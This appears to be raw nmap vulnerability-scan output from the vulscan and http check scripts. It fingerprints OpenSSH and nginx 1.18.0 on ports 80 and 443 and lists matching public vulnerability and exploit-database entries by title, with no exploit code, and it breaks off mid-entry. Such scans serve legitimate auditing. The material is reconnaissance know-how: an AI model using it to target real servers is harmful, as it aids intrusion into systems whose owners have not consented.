[10954] OpenSSH AFS/Kerberos ticket/token passing [10883] OpenSSH Channel Code Off by 1 [10823] OpenSSH UseLogin Environment Variables SecurityTracker - https://www.securitytracker.com: [1028187] OpenSSH pam_ssh_agent_auth Module on Red Hat Enterprise Linux Lets Remote Users Execute Arbitrary Code [1026593] OpenSSH Lets Remote Authenticated Users Obtain Potentially Sensitive Information [1025739] OpenSSH on FreeBSD Has Buffer Overflow in pam_thread() That Lets Remote Users Execute Arbitrary Code [1025482] OpenSSH ssh-keysign Utility Lets Local Users Gain Elevated Privileges [1025028] OpenSSH Legacy Certificates May Disclose Stack Contents to Remote Users [1022967] OpenSSH on Red Hat Enterprise Linux Lets Remote Authenticated Users Gain Elevated Privileges [1021235] OpenSSH CBC Mode Error Handling May Let Certain Remote Users Obtain Plain Text in Certain Cases [1020891] OpenSSH on Debian Lets Remote Users Prevent Logins [1020730] OpenSSH for Red Hat Enterprise Linux Packages May Have Been Compromised [1020537] OpenSSH on HP-UX Lets Local Users Hijack X11 Sessions [1019733] OpenSSH Unsafe Default Configuration May Let Local Users Execute Arbitrary Commands [1019707] OpenSSH Lets Local Users Hijack Forwarded X Sessions in Certain Cases [1017756] Apple OpenSSH Key Generation Process Lets Remote Users Deny Service [1017183] OpenSSH Privilege Separation Monitor Validation Error May Cause the Monitor to Fail to Properly Control the Unprivileged Process [1016940] OpenSSH Race Condition in Signal Handler Lets Remote Users Deny Service and May Potentially Permit Code Execution [1016939] OpenSSH GSSAPI Authentication Abort Error Lets Remote Users Determine Valid Usernames [1016931] OpenSSH SSH v1 CRC Attack Detection Implementation Lets Remote Users Deny Service [1016672] OpenSSH on Mac OS X Lets Remote Users Deny Service [1015706] OpenSSH Interaction With OpenPAM Lets Remote Users Deny Service [1015540] OpenSSH scp Double Shell Character Expansion During Local-to-Local Copying May Let Local Users Gain Elevated Privileges in Certain Cases [1014845] OpenSSH May Unexpectedly Activate GatewayPorts and Also May Disclose GSSAPI Credentials in Certain Cases [1011193] OpenSSH scp Directory Traversal Flaw Lets Remote SSH Servers Overwrite Files in Certain Cases [1011143] OpenSSH Default Configuration May Be Unsafe When Used With Anonymous SSH Services [1007791] Portable OpenSSH PAM free() Bug May Let Remote Users Execute Root Code [1007716] OpenSSH buffer_append_space() and Other Buffer Management Errors May Let Remote Users Execute Arbitrary Code [1006926] OpenSSH Host Access Restrictions Can Be Bypassed By Remote Users [1006688] OpenSSH Timing Flaw With Pluggable Authentication Modules Can Disclose Valid User Account Names to Remote Users [1004818] OpenSSH's Secure Shell (SSH) Implementation Weakness May Disclose User Passwords to Remote Users During Man-in-the-Middle Attacks [1004616] OpenSSH Integer Overflow and Buffer Overflow May Allow Remote Users to Gain Root Access to the System [1004391] OpenSSH 'BSD_AUTH' Access Control Bug May Allow Unauthorized Remote Users to Authenticated to the System [1004115] OpenSSH Buffer Overflow in Kerberos Ticket and AFS Token Processing Lets Local Users Execute Arbitrary Code With Root Level Permissions [1003758] OpenSSH Off-by-one 'Channels' Bug May Let Authorized Remote Users Execute Arbitrary Code with Root Privileges [1002895] OpenSSH UseLogin Environment Variable Bug Lets Local Users Execute Commands and Gain Root Access [1002748] OpenSSH 3.0 Denial of Service Condition May Allow Remote Users to Crash the sshd Daemon and KerberosV Configuration Error May Allow Remote Users to Partially Authenticate When Authentication Should Not Be Permitted [1002734] OpenSSH's S/Key Implementation Information Disclosure Flaw Provides Remote Users With Information About Valid User Accounts [1002455] OpenSSH May Fail to Properly Restrict IP Addresses in Certain Configurations [1002432] OpenSSH's Sftp-server Subsystem Lets Authorized Remote Users with Restricted Keypairs Obtain Additional Access on the Server [1001683] OpenSSH Allows Authorized Users to Delete Other User Files Named Cookies OSVDB - http://www.osvdb.org: [92034] GSI-OpenSSH auth-pam.c Memory Management Authentication Bypass [90474] Red Hat / Fedora PAM Module for OpenSSH Incorrect error() Function Calling Local Privilege Escalation [90007] OpenSSH logingracetime / maxstartup Threshold Connection Saturation Remote DoS [81500] OpenSSH gss-serv.c ssh_gssapi_parse_ename Function Field Length Value Parsing Remote DoS [78706] OpenSSH auth-options.c sshd auth_parse_options Function authorized_keys Command Option Debug Message Information Disclosure [75753] OpenSSH PAM Module Aborted Conversation Local Information Disclosure [75249] OpenSSH sftp-glob.c remote_glob Function Glob Expression Parsing Remote DoS [75248] OpenSSH sftp.c process_put Function Glob Expression Parsing Remote DoS [72183] Portable OpenSSH ssh-keysign ssh-rand-helper Utility File Descriptor Leak Local Information Disclosure [70873] OpenSSH Legacy Certificates Stack Memory Disclosure [69658] OpenSSH J-PAKE Public Parameter Validation Shared Secret Authentication Bypass [67743] Novell NetWare OpenSSH SSHD.NLM Absolute Path Handling Remote Overflow [59353] OpenSSH sshd Local TCP Redirection Connection Masking Weakness [58495] OpenSSH sshd ChrootDirectory Feature SetUID Hard Link Local Privilege Escalation [56921] OpenSSH Unspecified Remote Compromise [53021] OpenSSH on ftp.openbsd.org Trojaned Distribution [50036] OpenSSH CBC Mode Chosen Ciphertext 32-bit Chunk Plaintext Context Disclosure [49386] OpenSSH sshd TCP Connection State Remote Account Enumeration [48791] OpenSSH on Debian sshd Crafted Username Arbitrary Remote SELinux Role Access [47635] OpenSSH Packages on Red Hat Enterprise Linux Compromised Distribution [47227] OpenSSH X11UseLocalhost X11 Forwarding Port Hijacking [45873] Cisco WebNS SSHield w/ OpenSSH Crafted Large Packet Remote DoS [43911] OpenSSH ~/.ssh/rc ForceCommand Bypass Arbitrary Command Execution [43745] OpenSSH X11 Forwarding Local Session Hijacking [43371] OpenSSH Trusted X11 Cookie Connection Policy Bypass [39214] OpenSSH linux_audit_record_event Crafted Username Audit Log Injection [37315] pam_usb OpenSSH Authentication Unspecified Issue [34850] OpenSSH on Mac OS X Key Generation Remote Connection DoS [34601] OPIE w/ OpenSSH Account Enumeration [34600] OpenSSH S/KEY Authentication Account Enumeration [32721] OpenSSH Username Password Complexity Account Enumeration [30232] OpenSSH Privilege Separation Monitor Weakness [29494] OpenSSH packet.c Invalid Protocol Sequence Remote DoS [29266] OpenSSH GSSAPI Authentication Abort Username Enumeration [29264] OpenSSH Signal Handler Pre-authentication Race Condition Code Execution [29152] OpenSSH Identical Block Packet DoS [27745] Apple Mac OS X OpenSSH Nonexistent Account Login Enumeration DoS [23797] OpenSSH with OpenPAM Connection Saturation Forked Process Saturation DoS [22692] OpenSSH scp Command Line Filename Processing Command Injection [20216] OpenSSH with KerberosV Remote Authentication Bypass [19142] OpenSSH Multiple X11 Channel Forwarding Leaks [19141] OpenSSH GSSAPIAuthentication Credential Escalation [18236] OpenSSH no pty Command Execution Local PAM Restriction Bypass [16567] OpenSSH Privilege Separation LoginGraceTime DoS [16039] Solaris 108994 Series Patch OpenSSH LDAP Client Authentication DoS [9562] OpenSSH Default Configuration Anon SSH Service Port Bounce Weakness [9550] OpenSSH scp Traversal Arbitrary File Overwrite [6601] OpenSSH *realloc() Unspecified Memory Errors [6245] OpenSSH SKEY/BSD_AUTH Challenge-Response Remote Overflow [6073] OpenSSH on FreeBSD libutil Arbitrary File Read [6072] OpenSSH PAM Conversation Function Stack Modification [6071] OpenSSH SSHv1 PAM Challenge-Response Authentication Privilege Escalation [5536] OpenSSH sftp-server Restricted Keypair Restriction Bypass [5408] OpenSSH echo simulation Information Disclosure [5113] OpenSSH NIS YP Netgroups Authentication Bypass [4536] OpenSSH Portable AIX linker Privilege Escalation [3938] OpenSSL and OpenSSH /dev/random Check Failure [3456] OpenSSH buffer_append_space() Heap Corruption [2557] OpenSSH Multiple Buffer Management Multiple Overflows [2140] OpenSSH w/ PAM Username Validity Timing Attack [2112] OpenSSH Reverse DNS Lookup Bypass [2109] OpenSSH sshd Root Login Timing Side-Channel Weakness [1853] OpenSSH Symbolic Link 'cookies' File Removal [839] OpenSSH PAMAuthenticationViaKbdInt Challenge-Response Remote Overflow [781] OpenSSH Kerberos TGT/AFS Token Passing Remote Overflow [730] OpenSSH Channel Code Off by One Remote Privilege Escalation [688] OpenSSH UseLogin Environment Variable Local Command Execution [642] OpenSSH Multiple Key Type ACL Bypass [504] OpenSSH SSHv2 Public Key Authentication Bypass [341] OpenSSH UseLogin Local Privilege Escalation
80	tcp	open	http	syn-ack	nginx	1.18.0
	http-stored-xss	Couldn't find any stored XSS vulnerabilities.
	http-passwd	ERROR: Script execution failed (use -d to debug)
	http-dombased-xss	Couldn't find any DOM based XSS.
	http-csrf	Couldn't find any CSRF vulnerabilities.
	vulscan	VulDB - https://vuldb.com: [155282] nginx up to 1.18.0 privilege escalation MITRE CVE - https://cve.mitre.org: [CVE-2013-2070] http/modules/ngx_http_proxy_module.c in nginx 1.1.4 through 1.2.8 and 1.3.0 through 1.4.0, when proxy_pass is used with untrusted HTTP servers, allows remote attackers to cause a denial of service (crash) and obtain sensitive information from worker process memory via a crafted proxy response, a similar vulnerability to CVE-2013-2028. [CVE-2012-2089] Buffer overflow in ngx_http_mp4_module.c in the ngx_http_mp4_module module in nginx 1.0.7 through 1.0.14 and 1.1.3 through 1.1.18, when the mp4 directive is used, allows remote attackers to cause a denial of service (memory overwrite) or possibly execute arbitrary code via a crafted MP4 file. [CVE-2012-1180] Use-after-free vulnerability in nginx before 1.0.14 and 1.1.x before 1.1.17 allows remote HTTP servers to obtain sensitive information from process memory via a crafted backend response, in conjunction with a client request. [CVE-2013-2028] The ngx_http_parse_chunked function in http/ngx_http_parse.c in nginx 1.3.9 through 1.4.0 allows remote attackers to cause a denial of service (crash) and execute arbitrary code via a chunked Transfer-Encoding request with a large chunk size, which triggers an integer signedness error and a stack-based buffer overflow. [CVE-2011-4963] nginx/Windows 1.3.x before 1.3.1 and 1.2.x before 1.2.1 allows remote attackers to bypass intended access restrictions and access restricted files via (1) a trailing . (dot) or (2) certain "$index_allocation" sequences in a request. [CVE-2011-4315] Heap-based buffer overflow in compression-pointer processing in core/ngx_resolver.c in nginx before 1.0.10 allows remote resolvers to cause a denial of service (daemon crash) or possibly have unspecified other impact via a long response. SecurityFocus - https://www.securityfocus.com/bid/: [99534] Nginx CVE-2017-7529 Remote Integer Overflow Vulnerability [93903] Nginx CVE-2016-1247 Remote Privilege Escalation Vulnerability [91819] Nginx CVE-2016-1000105 Security Bypass Vulnerability [90967] nginx CVE-2016-4450 Denial of Service Vulnerability [82230] nginx Multiple Denial of Service Vulnerabilities [78928] Nginx CVE-2010-2266 Denial-Of-Service Vulnerability [70025] nginx CVE-2014-3616 SSL Session Fixation Vulnerability [69111] nginx SMTP Proxy Remote Command Injection Vulnerability [67507] nginx SPDY Implementation CVE-2014-0088 Arbitrary Code Execution Vulnerability [66537] nginx SPDY Implementation Heap Based Buffer Overflow Vulnerability [63814] nginx CVE-2013-4547 URI Processing Security Bypass Vulnerability [59824] Nginx CVE-2013-2070 Remote Security Vulnerability [59699] nginx 'ngx_http_parse.c' Stack Buffer Overflow Vulnerability [59496] nginx 'ngx_http_close_connection()' Remote Integer Overflow Vulnerability [59323] nginx NULL-Byte Arbitrary Code Execution Vulnerability [58105] Nginx 'access.log' Insecure File Permissions Vulnerability [57139] nginx CVE-2011-4968 Man in The Middle Vulnerability [55920] nginx CVE-2011-4963 Security Bypass Vulnerability [54331] Nginx Naxsi Module 'nx_extract.py' Script Remote File Disclosure Vulnerability [52999] nginx 'ngx_http_mp4_module.c' Buffer Overflow Vulnerability [52578] nginx 'ngx_cpystrn()' Information Disclosure Vulnerability [50710] nginx DNS Resolver Remote Heap Buffer Overflow Vulnerability [40760] nginx Remote Source Code Disclosure and Denial of Service Vulnerabilities [40434] nginx Space String Remote Source Code Disclosure Vulnerability [40420] nginx Directory Traversal Vulnerability [37711] nginx Terminal Escape Sequence in Logs Command Injection Vulnerability [36839] nginx 'ngx_http_process_request_headers()' Remote Buffer Overflow Vulnerability [36490] nginx WebDAV Multiple Directory Traversal Vulnerabilities [36438] nginx Proxy DNS Cache Domain Spoofing Vulnerability [36384] nginx HTTP Request Remote Buffer Overflow Vulnerability IBM X-Force - https://exchange.xforce.ibmcloud.com: [84623] Phusion Passenger gem for Ruby with nginx configuration insecure permissions [84172] nginx denial of service [84048] nginx buffer overflow [83923] nginx ngx_http_close_connection() integer overflow [83688] nginx null byte code execution [83103] Naxsi module for Nginx naxsi_unescape_uri() function security bypass [82319] nginx access.log information disclosure [80952] nginx SSL spoofing [77244] nginx and Microsoft Windows request security bypass [76778] Naxsi module for Nginx nx_extract.py directory traversal [74831] nginx ngx_http_mp4_module.c buffer overflow [74191] nginx ngx_cpystrn() information disclosure [74045] nginx header response information disclosure [71355] nginx ngx_resolver_copy() buffer overflow [59370] nginx characters denial of service [59369] nginx DATA source code disclosure [59047] nginx space source code disclosure [58966] nginx unspecified directory traversal [54025] nginx ngx_http_parse.c denial of service [53431] nginx WebDAV component directory traversal [53328] Nginx CRC-32 cached domain name spoofing [53250] Nginx ngx_http_parse_complex_uri() function code execution Exploit-DB - https://www.exploit-db.com: [26737] nginx 1.3.9/1.4.0 x86 Brute Force Remote Exploit [25775] Nginx HTTP Server 1.3.9-1.4.0 Chuncked Encoding Stack Buffer Overflow [25499] nginx 1.3.9-1.4.0 DoS PoC OpenVAS (Nessus) - http://www.openvas.org: [66451] Fedora Core 11 FEDORA-2009-12782 (nginx) [66450] Fedora Core 10 FEDORA-2009-12775 (nginx) [66449] Fedora Core 12 FEDORA-2009-12750 (nginx) [64912] Fedora Core 10 FEDORA-2009-9652 (nginx) [64911] Fedora Core 11 FEDORA-2009-9630 (nginx) [64869] Debian Security Advisory DSA 1884-1 (nginx) SecurityTracker - https://www.securitytracker.com: [1028544] nginx Bug Lets Remote Users Deny Service or Obtain Potentially Sensitive Information [1028519] nginx Stack Overflow Lets Remote Users Execute Arbitrary Code [1026924] nginx Buffer Overflow in ngx_http_mp4_module Lets Remote Users Execute Arbitrary Code [1026827] nginx HTTP Response Processing Lets Remote Users Obtain Portions of Memory Contents OSVDB - http://www.osvdb.org: [94864] cPnginx Plugin for cPanel nginx Configuration Manipulation Arbitrary File Access [93282] nginx proxy_pass Crafted Upstream Proxied Server Response Handling Worker Process Memory Disclosure [93037] nginx /http/ngx_http_parse.c Worker Process Crafted Request Handling Remote Overflow [92796] nginx ngx_http_close_connection Function Crafted r-&gt [92634] nginx ngx_http_request.h zero_in_uri URL Null Byte Handling Remote Code Execution [90518] nginx Log Directory Permission Weakness Local Information Disclosure [88910] nginx Proxy Functionality SSL Certificate Validation MitM Spoofing Weakness [84339] nginx/Windows Multiple Request Sequence Parsing Arbitrary File Access [83617] Naxsi Module for Nginx naxsi-ui/ nx_extract.py Traversal Arbitrary File Access [81339] nginx ngx_http_mp4_module Module Atom MP4 File Handling Remote Overflow [80124] nginx HTTP Header Response Parsing Freed Memory Information Disclosure [77184] nginx ngx_resolver.c ngx_resolver_copy() Function DNS Response Parsing Remote Overflow [65531] nginx on Windows URI ::$DATA Append Arbitrary File Access [65530] nginx Encoded Traversal Sequence Memory Corruption Remote DoS [65294] nginx on Windows Encoded Space Request Remote Source Disclosure [63136] nginx on Windows 8.3 Filename Alias Request Access Rules / Authentication Bypass [62617] nginx Internal DNS Cache Poisoning Weakness [61779] nginx HTTP Request Escape Sequence Terminal Command Injection [59278] nginx src/http/ngx_http_parse.c ngx_http_process_request_headers() Function URL Handling NULL Dereference DoS [58328] nginx WebDAV Multiple Method Traversal Arbitrary File Write [58128] nginx ngx_http_parse_complex_uri() Function Underflow [44447] nginx (engine x) msie_refresh Directive Unspecified XSS [44446] nginx (engine x) ssl_verify_client Directive HTTP/0.9 Protocol Bypass [44445] nginx (engine x) ngx_http_realip_module satisfy_any Directive Unspecified Access Bypass [44444] nginx (engine x) X-Accel-Redirect Header Unspecified Traversal [44443] nginx (engine x) rtsig Method Signal Queue Overflow [44442] nginx (engine x) Worker Process Millisecond Timers Unspecified Overflow
	http-server-header	nginx/1.18.0
	http-vuln-cve2013-7091	ERROR: Script execution failed (use -d to debug)
443	tcp	open	http	syn-ack	nginx		reverse proxy
	http-stored-xss	Couldn't find any stored XSS vulnerabilities.
	http-dombased-xss	Couldn't find any DOM based XSS.
	http-csrf	Couldn't find any CSRF vulnerabilities.
	vulscan	VulDB - https://vuldb.com: [176405] Nginx up to 1.13.5 Autoindex Module integer overflow [176114] Nginx Controller up to 3.6.x Agent Configuration File agent.conf permission [176113] Nginx Controller up to 3.9.x NAAS API Key Generation random values [176112] Nginx Controller up to 2.8.x/3.14.x systemd.txt insertion of sensitive information into sent data [176111] Nginx Controller up to 3.3.x Intra-Cluster Communication cleartext transmission [176110] Nginx Open Source/Plus/Ingress Controller Resolver off-by-one [171030] ExpressVPN Router 1 Nginx Webserver integer overflow [160163] Cloud Foundry Routing Nginx denial of service [159138] Kubernetes up to 0.27.x ingress-nginx privilege escalation [157631] Nginx Controller up to 1.0.1/2.8.x/3.4.x Kubernetes Package Download HTTP weak encryption [157630] Nginx Controller up to 1.0.1/2.8.x/3.4.x NATS Messaging System weak authentication [157629] Nginx Controller up to 1.0.1/2.8.x/3.4.x User Interface weak authentication [157572] Nginx Controller up to 3.4.0 API Endpoint Reflected cross site scripting [157571] Nginx Controller up to 1.0.1/2.9.0/3.4.0 User Interface cross site request forgery [155282] nginx up to 1.18.0 privilege escalation [154857] Nginx Controller up to 3.3.0 Web Server Logout weak authentication [154326] Nginx Controller up to 3.2.x Agent Installer Script install.sh privilege escalation [154324] Nginx Controller up to 3.2.x Postgres Database Server information disclosure [154323] Nginx Controller up to 3.1.x TLS weak authentication [152728] strong-nginx-controller up to 1.0.2 _nginxCmd privilege escalation [152416] Nginx Controller up to 3.1.x Controller API privilege escalation [148519] nginx up to 1.17.6 Error Page privilege escalation [145942] nginx 0.8.40 HTTP Proxy Module privilege escalation [144114] Xiaomi Mi WiFi R3G up to 2.28.22 Nginx Alias account directory traversal [133852] Sangfor Sundray WLAN Controller up to 3.7.4.2 Cookie Header nginx_webconsole.php privilege escalation [132132] SoftNAS Cloud 4.2.0/4.2.1 Nginx privilege escalation [131858] Puppet Discovery up to 1.3.x Nginx Container weak authentication [130644] Nginx Unit up to 1.7.0 Router Process memory corruption [127759] VeryNginx 0.3.3 Web Application Firewall 7PK Security Features [126525] nginx up to 1.14.0/1.15.5 ngx_http_mp4_module information disclosure [126524] nginx up to 1.14.0/1.15.5 HTTP2 denial of service [126523] nginx up to 1.14.0/1.15.5 HTTP2 denial of service [103517] nginx up to 1.13.2 Range Filter memory corruption [89849] nginx RFC 3875 Namespace Conflict privilege escalation [87719] nginx up to 1.11.0 ngx_files.c ngx_chain_to_iovec denial of service [80760] nginx 0.6.18/1.9.9 DNS CNAME Record denial of service [80759] nginx 0.6.18/1.9.9 DNS CNAME Record memory corruption [80758] nginx 0.6.18/1.9.9 DNS UDP Packet denial of service [65364] nginx up to 1.1.13 Default Configuration privilege escalation [61434] nginx 1.2.0/1.3.0 on Windows Access Restriction privilege escalation [59645] nginx up to 0.8.9 memory corruption [53592] nginx 0.8.36 privilege escalation [53590] nginx up to 0.8.9 information disclosure [51533] nginx 0.7.64 Terminal privilege escalation [50905] nginx up to 0.8.9 directory traversal [50903] nginx up to 0.8.10 memory corruption [50043] nginx up to 0.8.10 memory corruption [67677] nginx up to 1.7.3 SSL privilege escalation [67296] nginx up to 1.7.3 SMTP Proxy ngx_mail_smtp_starttls privilege escalation [12824] nginx 1.5.10 on 32-bit SPDY memory corruption [12822] nginx up to 1.5.11 SPDY memory corruption [11237] nginx up to 1.5.6 URI String privilege escalation [8671] nginx up to 1.4 proxy_pass privilege escalation [8618] nginx 1.3.9/1.4.0 http/ngx_http_parse.c ngx_http_parse_chunked Numeric Error [7247] nginx 1.2.6 Proxy Function weak authentication [5293] nginx up to 1.1.18 ngx_http_mp4_module memory corruption [4843] nginx up to 1.0.13/1.1.16 HTTP Header Response Parser ngx_http_parse.c denial of service MITRE CVE - https://cve.mitre.org: [CVE-2013-2070] http/modules/ngx_http_proxy_module.c in nginx 1.1.4 through 1.2.8 and 1.3.0 through 1.4.0, when proxy_pass is used with untrusted HTTP servers, allows remote attackers to cause a denial of service (crash) and obtain sensitive information from worker process memory via a crafted proxy response, a similar vulnerability to CVE-2013-2028. [CVE-2013-2028] The ngx_http_parse_chunked function in http/ngx_http_parse.c in nginx 1.3.9 through 1.4.0 allows remote attackers to cause a denial of service (crash) and execute arbitrary code via a chunked Transfer-Encoding request with a large chunk size, which triggers an integer signedness error and a stack-based buffer overflow. [CVE-2012-3380] Directory traversal vulnerability in naxsi-ui/nx_extract.py in the Naxsi module before 0.46-1 for Nginx allows local users to read arbitrary files via unspecified vectors. [CVE-2012-2089] Buffer overflow in ngx_http_mp4_module.c in the ngx_http_mp4_module module in nginx 1.0.7 through 1.0.14 and 1.1.3 through 1.1.18, when the mp4 directive is used, allows remote attackers to cause a denial of service (memory overwrite) or possibly execute arbitrary code via a crafted MP4 file. [CVE-2012-1180] Use-after-free vulnerability in nginx before 1.0.14 and 1.1.x before 1.1.17 allows remote HTTP servers to obtain sensitive information from process memory via a crafted backend response, in conjunction with a client request. [CVE-2011-4963] nginx/Windows 1.3.x before 1.3.1 and 1.2.x before 1.2.1 allows remote attackers to bypass intended access restrictions and access restricted files via (1) a trailing . (dot) or (2) certain "$index_allocation" sequences in a request. [CVE-2011-4315] Heap-based buffer overflow in compression-pointer processing in core/ngx_resolver.c in nginx before 1.0.10 allows remote resolvers to cause a denial of service (daemon crash) or possibly have unspecified other impact via a long response. [CVE-2010-2266] nginx 0.8.36 allows remote attackers to cause a denial of service (crash) via certain encoded directory traversal sequences that trigger memory corruption, as demonstrated using the "%c0.%c0." sequence. [CVE-2010-2263] nginx 0.8 before 0.8.40 and 0.7 before 0.7.66, when running on Windows, allows remote attackers to obtain source code or unparsed content of arbitrary files under the web document root by appending ::$DATA to the URI. [CVE-2009-4487] nginx 0.7.64 writes data to a log file without sanitizing non-printable characters, which might allow remote attackers to modify a window's title, or possibly execute arbitrary commands or overwrite files, via an HTTP request containing an escape sequence for a terminal emulator. [CVE-2009-3898] Directory traversal vulnerability in src/http/modules/ngx_http_dav_module.c in nginx (aka Engine X) before 0.7.63, and 0.8.x before 0.8.17, allows remote authenticated users to create or overwrite arbitrary files via a .. (dot dot) in the Destination HTTP header for the WebDAV (1) COPY or (2) MOVE method. [CVE-2009-3896] src/http/ngx_http_parse.c in nginx (aka Engine X) 0.1.0 through 0.4.14, 0.5.x before 0.5.38, 0.6.x before 0.6.39, 0.7.x before 0.7.62, and 0.8.x before 0.8.14 allows remote attackers to cause a denial of service (NULL pointer dereference and worker process crash) via a long URI. [CVE-2009-2629] Buffer underflow in src/http/ngx_http_parse.c in nginx 0.1.0 through 0.5.37, 0.6.x before 0.6.39, 0.7.x before 0.7.62, and 0.8.x before 0.8.15 allows remote attackers to execute arbitrary code via crafted HTTP requests. SecurityFocus - https://www.securityfocus.com/bid/: [99534] Nginx CVE-2017-7529 Remote Integer Overflow Vulnerability [93903] Nginx CVE-2016-1247 Remote Privilege Escalation Vulnerability [91819] Nginx CVE-2016-1000105 Security Bypass Vulnerability [90967] nginx CVE-2016-4450 Denial of Service Vulnerability [82230] nginx Multiple Denial of Service Vulnerabilities [78928] Nginx CVE-2010-2266 Denial-Of-Service Vulnerability [70025] nginx CVE-2014-3616 SSL Session Fixation Vulnerability [69111] nginx SMTP Proxy Remote Command Injection Vulnerability [67507] nginx SPDY Implementation CVE-2014-0088 Arbitrary Code Execution Vulnerability [66537] nginx SPDY Implementation Heap Based Buffer Overflow Vulnerability [63814] nginx CVE-2013-4547 URI Processing Security Bypass Vulnerability [59824] Nginx CVE-2013-2070 Remote Security Vulnerability [59699] nginx 'ngx_http_parse.c' Stack Buffer Overflow Vulnerability [59496] nginx 'ngx_http_close_connection()' Remote Integer Overflow Vulnerability [59323] nginx NULL-Byte Arbitrary Code Execution Vulnerability [58105] Nginx 'access.log' Insecure File Permissions Vulnerability [57139] nginx CVE-2011-4968 Man in The Middle Vulnerability [55920] nginx CVE-2011-4963 Security Bypass Vulnerability [54331] Nginx Naxsi Module 'nx_extract.py' Script Remote File Disclosure Vulnerability [52999] nginx 'ngx_http_mp4_module.c' Buffer Overflow Vulnerability [52578] nginx 'ngx_cpystrn()' Information Disclosure Vulnerability [50710] nginx DNS Resolver Remote Heap Buffer Overflow Vulnerability [40760] nginx Remote Source Code Disclosure and Denial of Service Vulnerabilities [40434] nginx Space String Remote Source Code Disclosure Vulnerability [40420] nginx Directory Traversal Vulnerability [37711] nginx Terminal Escape Sequence in Logs Command Injection Vulnerability [36839] nginx 'ngx_http_process_request_headers()' Remote Buffer Overflow Vulnerability [36490] nginx WebDAV Multiple Directory Traversal Vulnerabilities [36438] nginx Proxy DNS Cache Domain Spoofing Vulnerability [36384] nginx HTTP Request Remote Buffer Overflow Vulnerability IBM X-Force - https://exchange.xforce.ibmcloud.com: [84623] Phusion Passenger gem for Ruby with nginx configuration insecure permissions [84172] nginx denial of service [84048] nginx buffer overflow [83923] nginx ngx_http_close_connection() integer overflow [83688] nginx null byte code execution [83103] Naxsi module for Nginx naxsi_unescape_uri() function security bypass [82319] nginx access.log information disclosure [80952] nginx SSL spoofing [77244] nginx and Microsoft Windows request security bypass [76778] Naxsi module for Nginx nx_extract.py directory traversal [74831] nginx ngx_http_mp4_module.c buffer overflow [74191] nginx ngx_cpystrn() information disclosure [74045] nginx header response information disclosure [71355] nginx ngx_resolver_copy() buffer overflow [59370] nginx characters denial of service [59369] nginx DATA source code disclosure [59047] nginx space source code disclosure [58966] nginx unspecified directory traversal [54025] nginx ngx_http_parse.c denial of service [53431] nginx WebDAV component directory traversal [53328] Nginx CRC-32 cached domain name spoofing [53250] Nginx ngx_http_parse_complex_uri() function code execution Exploit-DB - https://www.exploit-db.com: [26737] nginx 1.3.9/1.4.0 x86 Brute Force Remote Exploit [25775] Nginx HTTP Server 1.3.9-1.4.0 Chuncked Encoding Stack Buffer Overflow [25499] nginx 1.3.9-1.4.0 DoS PoC [24967] nginx 0.6.x Arbitrary Code Execution NullByte Injection [14830] nginx 0.6.38 - Heap Corruption Exploit [13822] Nginx <= 0.7.65 / 0.8.39 (dev) Source Disclosure / Download Vulnerability [13818] Nginx 0.8.36 Source Disclosure and DoS Vulnerabilities [12804] nginx [engine x] http server <= 0.6.36 Path Draversal [9901] nginx 0.7.0-0.7.61, 0.6.0-0.6.38, 0.5.0-0.5.37, 0.4.0-0.4.14 PoC [9829] nginx 0.7.61 WebDAV directory traversal OpenVAS (Nessus) - http://www.openvas.org: [864418] Fedora Update for nginx FEDORA-2012-3846 [864310] Fedora Update for nginx FEDORA-2012-6238 [864209] Fedora Update for nginx FEDORA-2012-6411 [864204] Fedora Update for nginx FEDORA-2012-6371 [864121] Fedora Update for nginx FEDORA-2012-4006 [864115] Fedora Update for nginx FEDORA-2012-3991 [864065] Fedora Update for nginx FEDORA-2011-16075 [863654] Fedora Update for nginx FEDORA-2011-16110 [861232] Fedora Update for nginx FEDORA-2007-1158 [850180] SuSE Update for nginx openSUSE-SU-2012:0237-1 (nginx) [831680] Mandriva Update for nginx MDVSA-2012:043 (nginx) [802045] 64-bit Debian Linux Rootkit with nginx Doing iFrame Injection [801636] nginx HTTP Request Remote Buffer Overflow Vulnerability [103470] nginx 'ngx_http_mp4_module.c' Buffer Overflow Vulnerability [103469] nginx 'ngx_cpystrn()' Information Disclosure Vulnerability [103344] nginx DNS Resolver Remote Heap Buffer Overflow Vulnerability [100676] nginx Remote Source Code Disclosure and Denial of Service Vulnerabilities [100659] nginx Directory Traversal Vulnerability [100658] nginx Space String Remote Source Code Disclosure Vulnerability [100441] nginx Terminal Escape Sequence in Logs Command Injection Vulnerability [100321] nginx 'ngx_http_process_request_headers()' Remote Buffer Overflow Vulnerability [100277] nginx Proxy DNS Cache Domain Spoofing Vulnerability [100276] nginx HTTP Request Remote Buffer Overflow Vulnerability [100275] nginx WebDAV Multiple Directory Traversal Vulnerabilities [71574] Gentoo Security Advisory GLSA 201206-07 (nginx) [71308] Gentoo Security Advisory GLSA 201203-22 (nginx) [71297] FreeBSD Ports: nginx [71276] FreeBSD Ports: nginx [71239] Debian Security Advisory DSA 2434-1 (nginx) [66451] Fedora Core 11 FEDORA-2009-12782 (nginx) [66450] Fedora Core 10 FEDORA-2009-12775 (nginx) [66449] Fedora Core 12 FEDORA-2009-12750 (nginx) [64924] Gentoo Security Advisory GLSA 200909-18 (nginx) [64912] Fedora Core 10 FEDORA-2009-9652 (nginx) [64911] Fedora Core 11 FEDORA-2009-9630 (nginx) [64894] FreeBSD Ports: nginx [64869] Debian Security Advisory DSA 1884-1 (nginx) SecurityTracker - https://www.securitytracker.com: [1028544] nginx Bug Lets Remote Users Deny Service or Obtain Potentially Sensitive Information [1028519] nginx Stack Overflow Lets Remote Users Execute Arbitrary Code [1026924] nginx Buffer Overflow in ngx_http_mp4_module Lets Remote Users Execute Arbitrary Code [1026827] nginx HTTP Response Processing Lets Remote Users Obtain Portions of Memory Contents OSVDB - http://www.osvdb.org: [94864] cPnginx Plugin for cPanel nginx Configuration Manipulation Arbitrary File Access [93282] nginx proxy_pass Crafted Upstream Proxied Server Response Handling Worker Process Memory Disclosure [93037] nginx /http/ngx_http_parse.c Worker Process Crafted Request Handling Remote Overflow [92796] nginx ngx_http_close_connection Function Crafted r-&gt [92634] nginx ngx_http_request.h zero_in_uri URL Null Byte Handling Remote Code Execution [90518] nginx Log Directory Permission Weakness Local Information Disclosure [88910] nginx Proxy Functionality SSL Certificate Validation MitM Spoofing Weakness [84339] nginx/Windows Multiple Request Sequence Parsing Arbitrary File Access [83617] Naxsi Module for Nginx naxsi-ui/ nx_extract.py Traversal Arbitrary File Access [81339] nginx ngx_http_mp4_module Module Atom MP4 File Handling Remote Overflow [80124] nginx HTTP Header Response Parsing Freed 